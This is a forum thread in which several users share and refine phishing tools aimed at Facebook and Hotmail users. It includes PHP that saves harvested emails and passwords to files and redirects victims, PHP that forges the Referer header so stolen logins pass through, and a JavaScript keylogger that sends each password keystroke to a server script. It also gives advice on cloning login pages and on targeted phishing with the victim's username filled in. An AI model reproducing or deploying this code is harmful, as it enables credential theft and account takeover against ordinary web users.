Php Phishing

[bobbyb1980]

Hey guys. Thought I would post a little thing I've been working on. This is a .php page that phishes. When you go to this page, and if all happens like it's supposed to happen when the user inputs their credentials it will take those credentials and output them as both a .xml and a .txt document in the root dir of the server. After that there is a javascript redirect, so as long as the victim has javascript installed it should redirect them.

If you'd like to use this script for other pages like gmail or whatever, you should be able to clone whatever website you want using a clone script. Once the site is cloned you can copy/paste the php and java script chunk of code to the top of the index of the site.

I'm a giant n00b so any suggestions are appreciated.

<?php

if(isset($_POST['submit']))

{



$xml = simplexml_load_file("userFile.xml"); //This line will load the XML file.



$sxe = new SimpleXMLElement($xml->asXML()); //In this line it create a SimpleXMLElement object with the source of the XML file.

//The following lines will add a new child and others child inside the previous child created.

$person = $sxe->addChild("users");

$person->addChild("userEmail", $_POST["email"]);

$person->addChild("pass", $_POST["pass"]);

//This next line will overwrite the original XML file with new data added

$sxe->asXML("userFile.xml"); 







$ourFileName = "userFile.txt";

$fh = fopen($ourFileName, 'a') or die("can't open file");

$stringData = "User Email:".$_POST["email"]."\t";

fwrite($fh, $stringData);

$stringData = "Password:".$_POST["pass"]."\t";

fwrite($fh, $stringData);

fclose($fh);









?> 

<script>

location.href = "https://www.facebook.com/login.php?login_attempt=1";

</script>

<?php

}

?>

[kurtm]

thanks. but i have an idea so that the user will not detect if it is phishing.. how about once the victim logins credentials are saved as well as the redirect will truly redirects like they login already to the site eg. facebook can anyone do that?

[Sebkinne]

That is potentially possible, but I could imagine that facebook and the likes have referrer checks..

[Darren Kitchen]

Sounds interesting. How exactly are the sites cloned?

I once put together a quick and dirty PHP script similar to the redirect that ships on the MK3 which would serve up a nearly blank HTML document with a background image set as a slightly modified version of the website. Then an absolute div would place the html form elements for login. The PHP script would specify the jpg to use as well as the X and Y for username, password and login button. Cheap, I know, but very quick to make very basic phishing sites. I had picked the top 10 sites on alexa and was working on getting the top 100 done before I got distracted by another project.

[kurtm]

darren can you share that to us? thanks.

[Hyperant]

That is potentially possible, but I could imagine that facebook and the likes have referrer checks..

facebook does chack the referral where hotmail doesnt. Unless you can find away to change the referrell address sites like facebook will detect the login and alert the user (which you dont want to happen if its a phishing page)

with that said though you could use something like this in order to pass the login information onto the site and then load the page inside your own page.

http://www.mustap.com/phpzone_post_62_how-to-bypass-the-referer-se

<?php



// the site we want to attack

$host = "www.mysite.com"; 



// the file we want to attack

$file = "formprocess.php";



// construct a header for our request

$hdrs = array( 'http' => array(

    'method' => "POST",



    'header'=> "accept-language: en\r\n" . 

        "Host: $host\r\n" .

        "Referer: http://$host\r\n" .  // Setting the http-referer

        "Content-Type: application/x-www-form-urlencoded\r\n" .

        "Content-Length: 33\r\n\r\n" .

        "username=mustap&comment=NOCOMMENT\r\n"

    )

);



// get the requested page from the server

// with our header as a request-header



$context = stream_context_create($hdrs);

$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);

fpassthru($fp);

fclose($fp);

?>

[kurtm]

i have an idea to do this. how about javascript keylogger?

[Hyperant]

i have an idea to do this. how about javascript keylogger?

what something like this?

(this works on hotmail, save the source code for the hotmail login page then add this to it, you also need to add setupXML(); changePost(); to the body onLoad event)

		<script>
		//AJAX
var xhr =false;
var url ='save.php?key=';

//Setup and load the XMLHttpRequest object
function setupXML() {
	//Load the XMLHttpRequest for everything but IE
	if(window.XMLHttpRequest) {
		try {
			xhr =new XMLHttpRequest();
		} catch(e) {
				xhr =false;
		}
	} else {
		try {
			xhr =new ActiveXObject("Msxml2.XMLHTTP");
		} catch(e) {
			xhr =false;
		}
	}

	//Make sure we have an XMLHttpResponse object loaded into memory
	if(xhr) {
		xhr.onreadystatechange = processXHR;
	} else {
	}
}

function processXHR() {
}
</script>

		<script>
			function changePost() {
				document.getElementById('i0118').onkeydown =function(e) {
					var key ='';
					if(e.charCode)
						key =e.charCode;
					else
						key =e.keyCode;

					try {
						xhr.open ('GET', url +String.fromCharCode(key) +' : ' +key, true);
						xhr.send('');
					} catch(e) {
					}
				}
			}

		</script>

what it does is hooks the password input field then with every key press that gets entered into that input field it sends it to another php script on the server so that it can save the key strokes.

[kurtm]

bur the problem with keylogger,

yes it keylogs when 1 visitor type in,, but if 2 or more at the same time types in letters become scrambled. can it record every keystroke with ip address

exampl user 1 - 192.168.1.30 login pass

exampl user 2 - 192.168.1.34 login pass

exampl user 3 - 192.168.1.35 login pass

next problem what if the login and password is in auto fill which users will not type in

[Hyperant]

bur the problem with keylogger,

yes it keylogs when 1 visitor type in,, but if 2 or more at the same time types in letters become scrambled. can it record every keystroke with ip address

exampl user 1 - 192.168.1.30 login pass

exampl user 2 - 192.168.1.34 login pass

exampl user 3 - 192.168.1.35 login pass

next problem what if the login and password is in auto fill which users will not type in

its not really an issue if more then one person is typing in at the same time, on the php side of things that stores the password for you all you have to do is use a $_SESSION or something else to determine each user, or like you said the ip address, me personally i would use the ip address as the file name that the password is written to (but with that said, this is used as a phishing page and i would only use it as a targeted attack, so what i mean with that is the fake login page that they see will automatically have there username inserted within it, if your targeting say hotmail then the fake page that you use can be a login page that tells the user there session has expired, which hotmail has and they place the users email address in the username field for them all ready, which means if you use that page then you also need to do the same thing, do you see what i mean when i say its more of a targetted attack and not meant for just a random attack. But with that said it could also work as a random attack). As for the auto fill, well ill let you work that out, i mean shit iv all ready posted code on how to by pass the referral and now some code thats a javascript key logger. Read up on how the auto fill systems in browsers work and see if you can work out how to get around that, i can think of a few ways just off the to[p of my head ;)

/me isnt doing all the work for you

Edited February 16, 2012 by Hyperant